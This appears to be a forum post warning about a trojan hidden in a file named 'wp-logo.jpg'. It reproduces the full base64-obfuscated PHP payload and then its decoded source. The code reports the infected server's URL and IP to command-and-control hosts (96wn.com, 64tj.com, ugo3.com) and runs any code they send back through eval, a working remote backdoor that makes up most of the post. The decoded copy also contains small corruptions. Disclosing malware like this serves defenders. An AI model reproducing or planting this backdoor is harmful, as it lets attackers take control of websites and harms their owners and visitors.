Thanks for the trojan (wp-logo.jpg) ! Watch out guys !
<?php eval(base64_decode('DQp0cnkgew0KICAgICRzZXJ2ZXJVcmwgPSBhcnJheSgNCiAgICAgICAgIjk2d24uY29tL3RyYW5zaXQucGhwIiwNCiAgICAgICAgIjY0dGouY29tL3RyYW5zaXQucGhwIiwNCiAgICAgICAgInVnbzMuY29tL3RyYW5zaXQucGhwIiwNCiAgICApOw0KDQogICAgJGRvbWFpblBhY2tWZXJzaW9uID0gMTsNCiAgICBpZihhcnJheV9rZXlfZXhpc3RzKCdTRVJWRVJfQUREUicsICRfU0VSVkVSKSkNCiAgICAgICAgJGlwID0gJF9TRVJWRVJbJ1NFUlZFUl9BRERSJ107DQogICAgZWxzZWlmKGFycmF5X2tleV9leGlzdHMoJ0xPQ0FMX0FERFInLCAkX1NFUlZFUikpDQogICAgICAgICRpcCA9ICRfU0VSVkVSWydMT0NBTF9BRERSJ107DQogICAgZWxzZWlmKGFycmF5X2tleV9leGlzdHMoJ1NFUlZFUl9OQU1FJywgJF9TRVJWRVIpKQ0KICAgICAgICAkaXAgPSBnZXRob3N0YnluYW1lKCRfU0VSVkVSWydTRVJWRVJfTkFNRSddKTsNCiAgICBlbHNlIHsNCiAgICAgICAgaWYoc3RyaXN0cihQSFBfT1MsICdXSU4nKSkgew0KICAgICAgICAgICAgJGlwID0gZ2V0aG9zdGJ5bmFtZShwaHBfdW5hbWUoIm4iKSk7DQogICAgICAgIH0gZWxzZSB7DQogICAgICAgICAgICAkaWZjb25maWcgPSBzaGVsbF9leGVjKCcvc2Jpbi9pZmNvbmZpZyBldGgwJyk7DQogICAgICAgICAgICBwcmVnX21hdGNoKCcvYWRkcjooW1xkXC5dKykvJywgJGlmY29uZmlnLCAkbWF0Y2gpOw0KICAgICAgICAgICAgJGlwID0gJG1hdGNoWzFdOw0KICAgICAgICB9DQogICAgfQ0KICAgICRjdXJyZW50VXJsID0gcnRyaW0oJ2h0dHAnLihlbXB0eSgkX1NFUlZFUlsnSFRUUFMnXSk/Jyc6J3MnKS4nOi8vJy4kX1NFUlZFUlsnSFRUUF9IT1NUJ10uJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10sICcvJyk7DQogICAgJGRhdGEgPSBhcnJheSgNCiAgICAgICAgInVybCIgICAgICAgICAgICAgICA9PiAkY3VycmVudFVybCwNCiAgICAgICAgImlwIiAgICAgICAgICAgICAgICA9PiAkaXAsDQogICAgICAgICJkb21haW5QYWNrVmVyc2lvbiIgPT4gJGRvbWFpblBhY2tWZXJzaW9uLA0KICAgICAgICAiZmFpbGVkRG9tYWlucyIgICAgID0+IGFycmF5KCksDQogICAgKTsNCiAgICAkZmFpbGVkUmVxdWVzdCA9IHRydWU7DQogICAgJGZhaWxDb3VudGVyID0gMDsNCiAgICAkc29ja1N1Y2Nlc3MgPSBmYWxzZTsNCiAgICAkdXJsS2V5ID0gcmFuZCgwLCBjb3VudCgkc2VydmVyVXJsKS0xKTsNCiAgICAkc3ViRG9tYWluID0gcmFuZCgwLCAxMCk7DQogICAgd2hpbGUgKCEkc29ja1N1Y2Nlc3MpIHsNCiAgICAgICAgJHJlc3VsdCA9ICIiOw0KICAgICAgICAkdXJsID0gcGFyc2VfdXJsKCJodHRwOi8vYXBpIi4kc3ViRG9tYWluLiIuIi4kc2VydmVyVXJsWyR1cmxLZXldKTsNCiAgICAgICAgJGhvc3QgPSAkdXJsWyJob3N0Il07DQogICAgICAgICRwYXRoID0gICghZW1wdHkoJHVybFsicGF0aCJdKSkgPyAkdXJsWyJwYXRoIl0gOiAnJzsNCiAgICAgICAgJGZwID0gZnNvY2tvcGVuKCRob3N0LCA4MCwgJGVycm5vLCAkZXJyc3RyLCAxKTsNCiAgICAgICAgJGRhdGFRdWVyeT1odHRwX2J1aWxkX3F1ZXJ5KCRkYXRhKTsNCiAgICAgICAgaWYoJGZwKXsNCiAgICAgICAgICAgIGZwdXRzKCRmcCwgIlBPU1QgJHBhdGggSFRUUC8xLjEiLlBIUF9FT0wpOw0KICAgICAgICAgICAgZnB1dHMoJGZwLCAiSG9zdDogJGhvc3QiLlBIUF9FT0wpOw0KICAgICAgICAgICAgZnB1dHMoJGZwLCAiQ29udGVudC10eXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQiLlBIUF9FT0wpOw0KICAgICAgICAgICAgZnB1dHMoJGZwLCAiQ29udGVudC1sZW5ndGg6ICIuc3RybGVuKCRkYXRhUXVlcnkpLlBIUF9FT0wpOw0KICAgICAgICAgICAgZnB1dHMoJGZwLCAiQ29ubmVjdGlvbjogY2xvc2UiLlBIUF9FT0wuUEhQX0VPTCk7DQogICAgICAgICAgICBmcHV0cygkZnAsICRkYXRhUXVlcnkpOw0KICAgICAgICAgICAgd2hpbGUoIWZlb2YoJGZwKSkgJHJlc3VsdCAuPSBmZ2V0cygkZnAsIDEyOCk7DQogICAgICAgICAgICAkY29kZSA9IHN1YnN0cigkcmVzdWx0LDksMyk7DQogICAgICAgICAgICBmY2xvc2UoJGZwKTsNCiAgICAgICAgICAgIGlmIChpc19udW1lcmljKCRjb2RlKSAmJiAkY29kZT09PSIyMDAiKSB7DQogICAgICAgICAgICAgICAgYnJlYWs7DQogICAgICAgICAgICB9DQogICAgICAgIH0NCiAgICAgICAgaWYgKCRmYWlsZWRSZXF1ZXN0KSB7DQogICAgICAgICAgICAkZmFpbENvdW50ZXIrKzsNCiAgICAgICAgICAgICRkYXRhWydmYWlsZWREb21haW5zJ11bXSA9ICRzZXJ2ZXJVcmxbJHVybEtleV07DQogICAgICAgICAgICBhcnJheV9zcGxpY2UoJHNlcnZlclVybCwkdXJsS2V5LCAxKTsNCiAgICAgICAgICAgIGlmICghZW1wdHkoJHNlcnZlclVybCkgJiYgJGZhaWxDb3VudGVyPDIpDQogICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgJHN1YkRvbWFpbiA9IHJhbmQoMCwgMTApOw0KICAgICAgICAgICAgICAgICR1cmxLZXkgPSByYW5kKDAsIGNvdW50KCRzZXJ2ZXJVcmwpLTEpOw0KICAgICAgICAgICAgfQ0KICAgICAgICAgICAgZWxzZQ0KICAgICAgICAgICAgICAgIGJyZWFrOw0KICAgICAgICB9DQogICAgfQ0KICAgIGlmICghZW1wdHkoJHJlc3VsdCkgJiYgc3RycG9zKCRyZXN1bHQsICdyZXN1bHQ9JykhPT1mYWxzZSkNCiAgICB7DQogICAgICAgICR0ZW1wID0gZXhwbG9kZSgncmVzdWx0PScsICRyZXN1bHQsIDIpOw0KICAgICAgICBpZihpc3NldCgkdGVtcFsxXSkpew0KICAgICAgICAgICAgQGV2YWwoJHRlbXBbMV0pOw0KICAgICAgICB9DQogICAgfQ0KfSBjYXRjaCAoRXhjZXB0aW9uICRlKSB7DQoNCn0NCg=='));?>
And the translation:
try {
    $serverUrl = array(
        "96wn.com/transit.php",
        "64tj.com/transit.php",
        "ugo3.com/transit.php",
    );
    $domainPackVersion = 1;
    if(array_key_exists('SERVER_ADDR', $_SERVER))
        $ip = $_SERVER['SERVER_ADDR'];
    elseif(array_key_exists('LOCAL_ADDR', $_SERVER))
        $ip = $_SERVER['LOCAL_ADDR'];
    elseif(array_key_exists('SERVER_NAME', $_SERVER))
        $ip = gethostbyname($_SERVER['SERVER_NAME']);
    else {
        if(stristr(PHP_OS, 'WIN')) {
            $ip = gethostbyname(php_uname("n"));
        } else {
            $ifconfig = shell_exec('/sbin/ifconfig eth0');
            preg_match('/addr:([\d\.]+)/', $ifconfig, $match);
            $ip = $match[1];
        }
    }
    $currentUrl = rtrim('http'.(empty($_SERVER['HTTPS'])?'':'s').'://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'], '/');
    $data = array(
        "url"               => $currentUrl,
        "ip"                => $ip,
        "domainPackVersion" => $domainPackVersion,
        "failedDomains"     => array(),
    );
    $failedRequest = true;
    $failCounter = 0;
    $sockSuccess = false;
    $urlKey = rand(0, count($serverUrl)-1);
    $subDomain = rand(0, 10);
    while (!$sockSuccess) {
        $result = "";
        $url = parse_url("http://api".$subDomain.".".$serverUrl[$urlKey]);
        $host = $url["host"];
        $path =  (!empty($url["path"])) ? $url["path"] : '';
        $fp = fsockopen($host, 80, $errno, $errstr, 1);
        $dataQuery=http_build_query($data);
        if($fp){
            fputs($fp, "POST $path HTTP/1.1".PHP_EOL);
            fputs($fp, "Host: $host".PHP_EOL);
            fputs($fp, "Content-type: application/x-www-form-urlencoded".PHP_EOL);
            fputs($fp, "Content-length: ".strlen($dataQuery).PHP_EOL);
            fputs($fp, "Connection: close".PHP_EOL.PHP_EOL);
            fputs($fp, $dataQuery);
            while(!feof($fp)) $result .= fgets($fp, 128);
            $code = substr($result,9,3);
            fclose($fp);
            if (is_numeric($code) and& $code==="200") {
                break;
            }
        }
        if ($failedRequest) {
            $failCounter++;
            $data['failedDomains'][] = $serverUrl[$urlKey];
            array_splice($serverUrl,$urlKey, 1);
            if (!empty($serverUrl) and& $failCounter<2)
            {
                $subDomain = rand(0, 10);
                $urlKey = rand(0, count($serverUrl)-1);
            }
            else
                break;
        }
    }
    if (!empty($result) and& strpos($result, 'result=')!==false)
    {
        $temp = explode('result=', $result, 2);
        if(isset($temp[1])){
            @eval($temp[1]);
        }
    }
} catch (Exception $e) {
}
Report:
https://www.virustotal.com/ro/file/9307b...402952695/